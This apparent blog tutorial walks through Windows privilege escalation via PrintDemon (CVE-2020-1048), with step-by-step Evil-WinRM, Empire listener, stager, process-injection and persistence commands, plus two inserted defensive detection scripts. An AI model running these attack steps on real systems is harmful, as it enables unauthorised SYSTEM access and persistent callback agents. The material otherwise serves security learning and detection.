DLL HIJACKING USING “INVOKE-PRINTDEMON” POWERSHELL MODULE

Nathaneal Meththananda
8 min read · Feb 11, 2022


WHAT IS A DLL?

A DLL is a library that contains code and data that can be used by more than one program at the same time. As an example, in the Windows operating system the netshell.dll library implements network connection functions, so any program that loads this DLL can use the functions of netshell.dll without implementing them itself.

So all we need to know is that a DLL contains executable code, and most applications rely on DLLs that are already installed on the system.

HOW CAN WE HIJACK THE DLL?

DLL hijacking is a way for adversaries to execute malicious code on a system. Every application or service in a Windows environment looks for a number of DLLs in order to function properly. The vulnerability arises when a DLL the application attempts to load is not found at the location the application searched: an attacker can place a malicious DLL at that file path, so that when the application restarts it loads and executes the malicious code.

NOTE: IN THIS ARTICLE I'LL BE USING "CVE-2020-1048", THE PRINT SPOOLER PRIVILEGE ESCALATION, WHICH IS ALSO KNOWN AS "PRINTDEMON".

For this I'll be using a PowerShell script called "Invoke-PrintDemon" to take advantage of two vulnerabilities: PrintDemon and Faxhell (which abuses the Fax service).

WHAT IS PRINT SPOOLER?

The primary component of the printing interface is the print spooler. The print spooler is an executable file that manages the printing process. Management of printing involves retrieving the location of the correct printer driver, loading that driver, spooling high-level function calls into a print job, scheduling the print job for printing, and so on. The spooler is loaded at system startup and continues to run until the operating system is shut down.

FROM MICROSOFT

LINK1: https://docs.microsoft.com/en-us/windows/win32/printdocs/print-spooler

I would like you to read the following article from "windows-internals", which explains PrintDemon and the printing process.

LINK2: https://windows-internals.com/printdemon-cve-2020-1048/

Before I start talking about the practical way of hijacking a DLL, I would like to show you how to add and enumerate printer drivers on a Windows system.

A BRIEF EXPLANATION ON HOW TO ADD AND ENUMERATE PRINTER DRIVERS

Before we enumerate any of the drivers we need to install a simple driver to make the process possible. I will use a basic driver named "Generic / Text Only". Open up PowerShell as a standard user and enter the command below.

command: Add-PrinterDriver -Name "Generic / Text Only"

Now that you have installed the print driver, you can enumerate the drivers installed on the Windows system.

command: Get-PrinterDriver

After that you can add a printer port and enumerate the ports used by the printer; you can find more about this technique in LINK2.
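As an added example (not code from the original article or from the Invoke-PrintDemon project), the enumeration steps above turned into a small audit: it lists the installed drivers with the same Get-PrinterDriver cmdlet, then walks Get-PrinterPort and flags any port whose name is a file-system path rather than a device, which is what the PrintDemon technique in LINK2 relies on. The function name and the path pattern are this example's own choices.

```powershell
# Added example, not part of the original article. Enumerates printer drivers
# and ports and flags ports that point at a file instead of a device.
# Requires the PrintManagement module that ships with Windows 8 / Server 2012+.

function Get-SuspiciousPrinterPort {
    [CmdletBinding()]
    param()

    # Installed drivers, as in the article's Get-PrinterDriver step
    $drivers = @(Get-PrinterDriver | Select-Object Name, Manufacturer, DriverVersion)
    Write-Verbose ("Installed printer drivers: {0}" -f $drivers.Count)

    # Normal port names look like LPT1:, USB001, or an IP/WSD address.
    # A drive letter or UNC prefix means the "port" is really a file path
    # (pattern chosen for this example).
    $pathLike = '^(?:[A-Za-z]:\\|\\\\)'

    # Printers queried once so each flagged port can be tied to its printer(s)
    $printers = @(Get-Printer)

    foreach ($port in Get-PrinterPort) {
        if ($port.Name -match $pathLike) {
            $users = @($printers | Where-Object { $_.PortName -eq $port.Name }).Name
            [pscustomobject]@{
                PortName    = $port.Name
                Description = $port.Description
                UsedBy      = ($users -join ', ')
                Reason      = 'Port name is a file-system path'
            }
        }
    }
}

# Usage: show every port that writes to a file instead of a device
Get-SuspiciousPrinterPort -Verbose | Format-Table -AutoSize
```

Run it as the same standard user the article uses; no elevation is needed to read drivers and ports. An empty result means no file-backed ports are configured, which is the normal state on a workstation.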

For this practical demonstration I'll be using the "Empire-Framework" and the "Evil-WinRM" (Windows Remote Management) tools to accomplish the task.

BRIEF NOTE ABOUT “EVIL-WINRM”

It uses the standard SOAP-based protocol that allows hardware and operating systems from different vendors to work in conjunction with each other. This tool can be used to log in to an operating system with a user-level account.

So before we dive into DLL hijacking, let's use "evil-winrm" to log in to a Windows operating system.

command: evil-winrm -i {ip address} -u {username}

As you can see, I used evil-winrm with credentials to log in to a system, which gave me a PowerShell command line.

USER-LEVEL ACCOUNT

In the above image you can see that I have logged in with a user-level account.

Now let's start the "Empire-Framework". I'll be starting the server and the client, as well as Starkiller (the GUI version of the framework) if it's necessary at the end.

The above image shows how to start the server

The above image shows the client.

First let's create an 'http' listener and set the port it will listen on, using the following commands.

command: uselistener http
command2: set port 9001

SETTING UP THE LISTENER
SETTING UP THE PORT

Then type “execute” to start the listener on the attacker machine.

STARTING THE LISTENER

Since we have created a listener, we need to create a stager to deliver the agent to the target system. An agent is a process running on the target host that connects back to the created listener.

To create a stager, run the following commands:

  1. usestager multi/launcher
  2. set Listener http
  3. execute
CREATING A STAGER
GETTING THE BASE64 PAYLOAD

As you can see, after executing these commands I got a PowerShell payload encoded in base64. In this exercise I have disabled Windows Defender to make things easier and to keep the focus on the concept.

There are various ways to deliver the payload, but for now let's just copy and paste it into the PowerShell command line I got earlier through the "evil-winrm" tool.

EXECUTING THE PAYLOAD ON THE TARGET SYSTEM

In the above image you can see that I have pasted the payload into the Windows system.

GETTING A NEW AGENT FROM THE TARGET SYSTEM

As you can see, it has received a connection from the target host and created an agent for the system. :)

To get the list of agents on the framework, type "agents".

The agent shown in green is the only active agent, so we need to interact with it. For that use the following syntax: "interact {agent name}".

INTERACTING WITH THE NEW AGENT

To make this a stable shell without any restrictions we may have to migrate to another process on the system. For that we can use the 'ps' or 'Get-Process' command to list the running processes on the system.

LISTING OUT THE PROCESSES ON THE SYSTEM

From the list, I chose the "explorer" process since it is one of the most widely used processes.

NOTE: better not to use this process in a real-life operation, since the blue team would instantly notice and kill the session.

FINDING THE PROCESS TO INJECT (EXPLORER.EXE)

To migrate to the above process use the following syntax: "psinject {listener name} {processID}".

MIGRATING TO THE SELECTED PROCESS

Now we need to check whether the system is vulnerable to Invoke-PrintDemon. For this we can use a PowerShell command to confirm it.

command: Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion"

If the build is older than Windows 10 version 2004, the system is vulnerable.

ENUMERATING THE TARGET SYSTEM FOR THE VULNERABILITY

As you can see, the BuildNumber is "18362". I googled the number and found that this system is "Windows 10 version 1903". So this system is vulnerable to the "Invoke-PrintDemon" privilege escalation. :)

ANSWER FROM GOOGLE

So now we can use the PoC through the PowerShell Empire framework. This allows an unprivileged user to gain SYSTEM-level privileges through the Windows Print Spooler. The PowerShell module (Invoke-PrintDemon) prints a DLL named ualapi.dll into System32. The module then places a launcher in the registry, which executes code as SYSTEM on restart.

Before we start the "printdemon" module we need to create a stager so that the agent runs as the escalated user.

Once you have the base64 code, which is also called the "LauncherCode", we can start the printdemon module.

module: usemodule powershell/privesc/printdemon

Set the base64 code as the LauncherCode option.

SETTING THE LAUNCHERCODE IN THE MODULE

After setting everything up, type "execute" to run the module.

In order for the print job to have the privileges to write to System32, I have to restart the Print Spooler service, but the best thing to do is to restart the whole machine. During the restart the malicious DLL is written into System32. Our script is then written into the registry and triggers the Fax service to start a SYSTEM-level agent that calls back to our Empire server.
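From a responder's side, the two artifacts the paragraphs above describe are a ualapi.dll dropped into System32 and the Fax service that loads it. The following added example (not code from the article or from the Invoke-PrintDemon project) checks for exactly those: whether the file exists, whether it carries a valid Authenticode signature, when it was last written, and the state of the Fax service. The function name and the default path are this example's own choices.

```powershell
# Added example, not part of the original article. Checks a host for the
# artifacts described in the article: ualapi.dll in System32 and the Fax service.

function Test-UalapiArtifact {
    [CmdletBinding()]
    param(
        # Default location the article names; overridable for offline images
        [string]$DllPath = (Join-Path $env:SystemRoot 'System32\ualapi.dll')
    )

    $result = [ordered]@{
        DllPath    = $DllPath
        Present    = (Test-Path -LiteralPath $DllPath)
        Signature  = $null
        Signer     = $null
        LastWrite  = $null
        FaxService = 'not installed'
    }

    if ($result.Present) {
        # A printed/dropped DLL will not carry a Microsoft signature
        $sig = Get-AuthenticodeSignature -FilePath $DllPath
        $result.Signature = $sig.Status          # Valid, NotSigned, HashMismatch, ...
        $result.Signer    = $sig.SignerCertificate.Subject
        $result.LastWrite = (Get-Item -LiteralPath $DllPath).LastWriteTime
    }

    # The Fax service is the process that loads ualapi.dll at startup
    $fax = Get-Service -Name Fax -ErrorAction SilentlyContinue
    if ($fax) { $result.FaxService = "$($fax.Status) ($($fax.StartType))" }

    [pscustomobject]$result
}

# Usage: a Present file with Signature NotSigned or a non-Microsoft Signer,
# especially with a LastWrite close to a reboot, matches the article's chain
Test-UalapiArtifact | Format-List
```

Treat a present ualapi.dll whose signature is missing or does not chain to Microsoft as the indicator; compare its LastWrite time with the Print Spooler and Fax service start times in the System event log to confirm the sequence the article walks through.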

To restart the system enter the following command on the newly created agent.

command: usemodule management/restart

RESTARTING THE MACHINE

After restarting the machine you should have persistence on the machine.

I'll explain how to launch "Invoke-PrintDemon" as a script command on the PowerShell client in my next article.

SCRIPT_LINK: https://github.com/BC-SECURITY/Invoke-PrintDemon/blob/master/Invoke-PrintDemon.ps1

I hope you understood the concept of how to hijack a DLL using the "Invoke-PrintDemon" module. Thank you for reading.

Snowdox :)


Written by Nathaneal Meththananda

19 years | Security Engineer | Malware Analyst | Penetration Tester | Sri Lankan
